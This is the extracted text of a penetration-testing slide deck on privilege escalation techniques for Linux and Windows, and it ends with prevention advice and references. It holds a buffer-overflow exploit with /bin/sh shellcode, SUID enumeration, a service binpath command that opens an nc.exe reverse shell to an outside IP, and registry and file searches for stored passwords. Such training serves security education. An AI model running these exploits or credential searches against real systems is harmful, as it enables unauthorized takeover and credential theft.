  • 24. # “Privilege Escalation” Ways for Linux • Vulnerable Applications / Programs / Services use high privilege users • Characteristic of vulnerable program • Has permission “root” as user or group • Has set SUID, GUID list="$(find / -perm -4000 -o -perm -2000)";for i in $list; do ls -al $i; done ls –R / | grep “wsr” | grep “root”
  • 25. # “Privilege Escalation” Ways for Linux • Vulnerable Applications / Programs / Services use high privilege users
  • 26. # “Privilege Escalation” Ways for Linux • Vulnerable Applications / Programs / Services use high privilege users • Characteristic of vulnerable program • Can perform Overflow
  • 27. # “Privilege Escalation” Ways for Linux • Vulnerable Applications / Programs / Services use high privilege users Check buffer overflow position
  • 28. # “Privilege Escalation” Ways for Linux • Vulnerable Applications / Programs / Services use high privilege users Check buffer overflow position
  • 29. #objdump –d vul_app | grep “jmp” | grep “esp” # ROPgadget --binary vul_app --only "jmp“ | grep esp 0x08049f0f : jmp %esp # “Privilege Escalation” Ways for Linux • Vulnerable Applications / Programs / Services use high privilege users
  • 30. # “Privilege Escalation” Ways for Linux • Vulnerable Applications / Programs / Services use high privilege users Shellcode system(“/bin//sh”) Shellcode= “x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90 x31xC0x50x68x2Fx2Fx73x68x68x2Fx62x69x6Ex89xE3x50x53x89xE1xB0x0BxCDx80” jmp %esp 0x08049f0f esp
  • 31. #python –c ‘ “A”*612 + “x0fx49x04x08” + “x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90 x31xC0x50x68x2Fx2Fx73x68x68x2Fx62x69x6Ex89xE3x50x53x89xE1xB0x0BxCDx80”’ | ./vul_app # “Privilege Escalation” Ways for Linux Privilege is dropped
  • 32. # “Privilege Escalation” Ways for Linux • Vulnerable Applications / Programs / Services use high privilege users #nano /tmp/sh.c
  • 33. # “Privilege Escalation” Ways for Linux #python –c ‘ “A”*612 + “x0fx49x04x08” + “x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90 x31xC0x50x68x2Fx2Fx73x68x68x2Fx74x6dx70x89xE3x50x53x89xE1xB0x0BxCDx80”’ | ./vul_app tmp • Vulnerable Applications / Programs / Services use high privilege users
  • 35. # “Privilege Escalation” Ways for Linux The real life is not easy !!!! • Canary (Buffer overflow detection) • Executable Stack Prevention (NX , DEP) • Address Space Layout Randomization (ASLR)
  • 36. # “Privilege Escalation” Ways for Linux But It’s possible to bypass !!! • Canary (Buffer overflow detection) -> Canary Repair • Executable Stack Prevention (NX , DEP) -> Ret-2-Libc , ROP • Address Space Layout Randomization (ASLR) -> Static Lib, App Warp Up https://www.slideshare.net/ammarit/unix-executable-buffer-overflow?qid=3ae3efd0-d1b4-4f3c-b85c- 82b1d063aa6b&v=&b=&from_search=1
  • 37. # “Privilege Escalation” Ways for Linux • Weak permission file of Jobs/Task run by high privilege users /etc/cron.d /etc/crontab /etc/cron.hourly /etc/cron.daily /etc/cron.weekly /etc/cron.monthly # ls -Ral /etc/cron*
  • 38. # “Privilege Escalation” Ways for Linux • Weak permission file of Jobs/Task run by high privilege users Reverse shell
  • 39. # “Privilege Escalation” Ways for Linux • Weak permission file of Jobs/Task run by high privilege users
  • 41. # “Privilege Escalation” Ways for Linux • Weak permission file of Jobs/Task run by high privilege users
  • 42. # “Privilege Escalation” Ways for Linux • Sudoer (Compromised user we got maybe in the sudoer list)
  • 43. # “Privilege Escalation” Ways for Linux • System Misconfiguration
  • 44. # “Privilege Escalation” Ways for Linux • Kernel Exploitation Ex: DirtyCOW
  • 45. # “Privilege Escalation” Ways for Linux • Kernel Exploitation (Trick) Ex: Linux version 2.6.9-89.EL • Compile exploit on the target system on target like environment • Metasploitable is good exploit compile environment
  • 46. # “Privilege Escalation” Ways for Linux #ps –ef | grep root root 1644 0.0 0.6 4504 1676 ? S 19:34 0:00 smbd -D • Remote Exploitation by local host 127.0.0.1
  • 47. # “Privilege Escalation” Ways for Linux • [Linux Privilege Escalation Scripts and Commands] Ref : https://netsec.ws/?p=309 LinEnum http://www.rebootuser.com/?p=1758 LinuxPrivChecker http://www.securitysift.com/download/linuxprivchecker.py Basic-linux-privilege-escalation https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation
  • 48. • LinuxPrivChecker # “Privilege Escalation” Ways for Linux
  • 49. • LinuxPrivChecker # “Privilege Escalation” Ways for Linux
  • 50. # “Privilege Escalation” Ways for Linux • Case Study :
  • 51. # “Privilege Escalation” Ways for Linux • Case Study :
  • 52. # “Privilege Escalation” Ways for Linux • Case Study : But no exploit detail in exploit-db !!!
  • 53. # “Privilege Escalation” Ways for Linux • Case Study :
  • 54. # “Privilege Escalation” Ways for Linux • Case Study :
  • 55. Low Priv Other Unix Servers Dirty Cow Default password Crack root pass root Bypass Restrict Shell CMC # “Privilege Escalation” Ways for Linux • Case Study :
  • 56. # “Privilege Escalation” Ways for Windows • Remote Exploit to vulnerable service running by high privilege users • Weak password of high privilege users • Credential store in file and Registry • Vulnerable Applications / Programs / Services use high privilege users • Weak permission file of Jobs/Task run by high privilege users • System Misconfiguration • Kernel Exploitation • Pass-the-hash • DLL Injection • DLL Hijacking • Remote Exploitation by local host • Hotpotato • Many more…
  • 57. # Remote Exploit to escalate privilege • Exploit to vulnerable service running with high privilege users
  • 58. # Remote Exploit to escalate privilege • Exploit to vulnerable service running with high privilege users Credit : Worawit Wangwarunyoo (sleepya)
  • 59. • Exploit to vulnerability of the service misconfigure running with high privilege users # “Privilege Escalation” Ways for Windows
  • 60. • Exploit to vulnerability of the service misconfigure running with high privilege users # “Privilege Escalation” Ways for Windows
  • 61. # Remote Exploit to escalate privilege • Exploit to vulnerability of the service misconfigure running with high privilege users WebShell
  • 62. # “Privilege Escalation” Ways for Windows • Reverse Meterpreter “getsystem” command
  • 63. # “Privilege Escalation” Ways for Windows • Reverse Meterpreter “getsystem” command “It’s not always easy in the real life”
  • 64. • PS Migration # “Privilege Escalation” Ways for Windows
  • 65. • PS Migration # “Privilege Escalation” Ways for Windows
  • 66. • PS Migration # “Privilege Escalation” Ways for Windows
  • 67. # Remote Exploit to escalate privilege • Credential store in files findstr /si password *.txt findstr /si password *.xml findstr /si password *.ini Pass PASS PWD
  • 68. c:sysprep.inf c:sysprepsysprep.xml c:unattend.xml %WINDIR%PantherUnattendUnattended.xml %WINDIR%PantherUnattended.xml dir c:*vnc.ini /s /b dir c:*ultravnc.ini /s /b dir c: /s /b | findstr /si *vnc.ini # Remote Exploit to escalate privilege • Credential store in files
  • 69. # Remote Exploit to escalate privilege https://adsecurity.org/?p=2288 (<DOMAIN>SYSVOL<DOMAIN>Policies)• Credential store in DC Policy Script files
  • 70. # Remote Exploit to escalate privilege • Credential store in registry # VNC reg query "HKCUSoftwareORLWinVNC3Password" # Windows autologin reg query "HKLMSOFTWAREMicrosoftWindows NTCurrentversionWinlogon" # SNMP Paramters reg query "HKLMSYSTEMCurrentControlSetServicesSNMP" # Putty reg query "HKCUSoftwareSimonTathamPuTTYSessions" # Search for password in registry reg query HKLM /f password /t REG_SZ /s reg query HKCU /f password /t REG_SZ /s
  • 71. # Remote Exploit to escalate privilege • Credential store in registry
  • 72. # Remote Exploit to escalate privilege
  • 73. # Remote Exploit to escalate privilege http://www.labofapenetrationtester.com/2015/05/ dumping-passwords-in-plain-on-windows-8-1.html Windows Server 2012
  • 74. # Remote Exploit to escalate privilege
  • 75. # Remote Exploit to escalate privilege • Token Impersonation https://www.offensive-security.com/metasploit-unleashed/fun-incognito/
  • 76. • Insecure Services permission # “Privilege Escalation” Ways for Windows
  • 77. • Insecure Services permission -> Modify binpath # “Privilege Escalation” Ways for Windows https://technet.microsoft.com/en-us/sysinternals/accesschk.aspx
  • 78. • Insecure Services permission -> Modify binpath # “Privilege Escalation” Ways for Windows https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
  • 79. • Insecure Services permission -> Modify binpath (Example) # “Privilege Escalation” Ways for Windows
  • 80. • Insecure Services permission -> Modify binpath (Example) # “Privilege Escalation” Ways for Windows sc config upnphost binpath= "C:Inetpubnc.exe -nv 10.11.0.110 5555 -e C:WINDOWSSystem32cmd.exe"
  • 81. • Insecure Services permission by msf # “Privilege Escalation” Ways for Windows
  • 82. # “Privilege Escalation” Ways for Windows
  • 83. # “Privilege Escalation” Ways for Windows Ref:https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/ • Unquoted Service Paths When Windows attempts to run this service, it will look at the following paths in order and will run the first EXE that it will find:
  • 84. # “Privilege Escalation” Ways for Windows Ref:https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/ • Unquoted Service Paths
  • 85. # “Privilege Escalation” Ways for Windows • Unquoted Service Paths
  • 86. # “Privilege Escalation” Ways for Windows • Unquoted Service Paths
  • 87. # “Privilege Escalation” Ways for Windows
  • 88. # “Privilege Escalation” Ways for Windows
  • 89. # “Privilege Escalation” Ways for Windows • Unquote path + MS15-067
  • 90. # “Privilege Escalation” Ways for Windows • Unquote path + MS15-067
  • 91. # “Privilege Escalation” Ways for Windows GGEZ • Unquote path + MS15-067
  • 92. • DLL Hijacking # “Privilege Escalation” Ways for Windows https://msitpros.com/?p=2012 The way that Windows loads DLLs then, is to search the following directories in this order: – The directory from which the application loaded – C:WindowsSystem32 – C:WindowsSystem – C:Windows – The current working directory – Directories in the system PATH environment variable – Directories in the user PATH environment variable https://www.gracefulsecurity.com/privesc-dll-hijacking/
  • 93. • DLL Hijacking # “Privilege Escalation” Ways for Windows https://pentestlab.blog/2017/03/27/dll-hijacking/
  • 94. # “Privilege Escalation” Ways for Windows • DLL Hijacking https://pentestlab.blog/2017/03/27/dll-hijacking/
  • 97. # “Privilege Escalation” Ways for Windows • Driver Exploitation
  • 98. https://www.exploit-db.com/exploits/42665/ Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow Privilege Escalation• Driver Exploitation Example : # “Privilege Escalation” Ways for Windows
  • 99. • HOT Potato # “Privilege Escalation” Ways for Windows
  • 100. • HOT Potato # “Privilege Escalation” Ways for Windows Manual add user Use Hot Potato technique
  • 101. # “Privilege Escalation” Ways for Windows • Pass-th-Hash
  • 102. • Remote Exploit on the localhost # “Privilege Escalation” Ways for Windows
  • 103. # “Privilege Escalation” Ways for Windows • Local exploit with Metasploit
  • 104. # “Privilege Escalation” Ways for Windows • Local exploit with Metasploit
  • 105. • Local Exploit to escalate privilege # “Privilege Escalation” Ways for Windows
  • 106. # “Privilege Escalation” Ways for Windows
  • 107. # “Privilege Escalation” Ways for Windows • Local Exploit to escalate privilege
  • 108. # “Privilege Escalation” Ways for Windows
  • 109. dpkg --add-architecture i386 && apt-get update && apt-get install wine32 pip install pyinstaller # “Privilege Escalation” Ways for Windows
  • 110. # “Privilege Escalation” Ways for Windows DEMO Noobx_shell
  • 111. # “Privilege Escalation” Ways for Windows
  • 112. # “Privilege Escalation” Ways for Windows
  • 113. # “Privilege Escalation” Ways for Windows • Case Study 2 # MS17-010 DC1 Servers Client PC Unpatch
  • 114. # “Privilege Escalation” Ways for Windows • Case Study 2 # MS17-010
  • 115. # “Privilege Escalation” Ways for Windows • Case Study 2 # MS17-010
  • 116. # “Privilege Escalation” Ways for Windows • Case Study 2 # MS17-010 DC1 Servers Client PC Unpatch
  • 117. # “Privilege Escalation” on other devices • Mobile Phone • Root or Jailbreak • DirtyCow • Network Device • Remote Exploit • EXTRABACON exploit • Backdooring • ROM0 • Password Crack of high privilege level account
  • 118. # “Privilege Escalation” on other devices
  • 119. # Prevention • Secure by design • System hardening • Disable unused service • Disable/remove unused programs , users or backup files • Installed endpoint security • Strong Access Control and Authentication • Least Privilege • Patch Management • Security Assessment • Vulnerability Assessment • Penetration Testing
  • 120. Q & A
  • 122. Thank You Ammarit Thongthua, CISSP CISM GXPN Risk Advisory Manager, Deloitte Thailand
  • 123. • http://www.fuzzysecurity.com/tutorials/16.html • https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html • https://github.com/rmusser01/Infosec_Reference/blob/master/Draft/Privilege%20Escalation%20%26%20Post- Exploitation.md • http://www.hackingarticles.in/7-ways-get-admin-access-remote-windows-pc-bypass-privilege-escalation/ • https://pentestlab.blog/2017/04/04/dll-injection # References